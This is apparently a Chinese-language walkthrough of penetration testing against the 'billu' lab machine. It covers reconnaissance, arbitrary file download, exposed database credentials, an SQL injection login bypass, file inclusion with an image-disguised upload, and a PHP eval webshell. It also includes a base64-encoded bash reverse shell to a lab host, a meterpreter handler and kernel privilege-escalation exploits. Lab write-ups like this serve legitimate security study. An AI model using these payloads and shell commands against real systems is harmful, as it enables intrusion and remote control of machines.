bilu靶场渗透测试

bilu靶场渗透

信息采集：

扫描IP：

发现主机IP

扫描端口：

发现 22端口 80端口

扫描系统：

系统版本：Linux 3.2-3.9

namp漏扫：

过滤了一些xss、csrf漏洞，httponly没有设置，可以获取session。

中间件：apache 2.2.22/php

御剑扫描后台：

AWVS扫描：

Nessus扫描：

提示版本过低

web渗透：

任意文件下载：

http://192.168.80.138/test.php

存在任意文件下载，可以将黑盒变百盒（前提也是知道文件名）

下载test.php查看源码，发现存在file_exists()函数，如果存在面向对象可以利用。

文件上传：

猜测是可以任意文件上传

配合文件下载查看源码，发现好像上传什么都没有影响。

数据库信息暴露：

通过任意文件下载可以将后台扫出的都下载出来查看源代码。

c.php

show.php

分析代码，如果POST参数存在就输出users表中的数据。

数据库连接用户名：billu

连接密码：b0x_billu

数据库名称：ica_lab

index.php

下载查看源代码可得查询语句

将单引号设为空了，思考怎么绕过登录成功

用户名： or 1=1#admin

密码：admin \

可以直接登录成功

文件包含：

panel.php

getcwd()函数是返回当前路径，想要利用就需要利用到最后一个if，所以$choice!=(add||show),$_POST[‘load’]是利用的文件。

文件上传：

panel.php

设置了白名单对文件类型进行了判断，只能上传图片码，修改幻术插入GIF89a。

得到文件路径。

文件利用

在panel.php页面利用

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-peABz7Ij-1666595178192)(C:\Users\hp\AppData\Roaming\Typora\typora-user-images\image-20221023220036481.png)]

现在只需要修改参数即可，就可以实现任意php代码执行。

反弹shell：

一、直接执行系统命令，反向连接

continue=111&load=uploaded_images/888.gif&code=system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg | base64 -d | bash");
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg | base64 -d | bash
#bash -i >& /dev/tcp/192.168.80.129/4444 0>&1   =》YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjEyOS80NDQ0IDA+JjEg 反向连接的shell进行base64转码
#base64 -d  进行解码
#bash 指定运行环境

二、通过php来写一个php正向连接

continue=11&load=uploaded_images/888.gif&code=file_put_contents('uploaded_images/shell.php', '<?php @eval($_POST["code"]);');

使用菜刀连接

植入冰蝎shell

在冰蝎上执行反弹shell

或者直接反向连接metepreter

在msfconsole中使用exploit模块
set payload php/meterpreter/reverse_tcp  设置payload为php的代码
use exploit/multi/handler
设置远程主机就好，配合冰蝎反向连接

提权

查看系统信息和用户信息

使用shell连接

python -c 'import pty; pty.spawn("/bin/bash")'
创建一个终端
C语言版本：gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) 
python版本：Python 2.7.3 (default, Feb 27 2014, 20:00:17) 

获取内核版本

uname -srm
Linux 3.13.0-32-generic i686

搜索内核可用脏牛的漏洞

searchspliot -t 3.13

尝试33824失败，尝试37292成功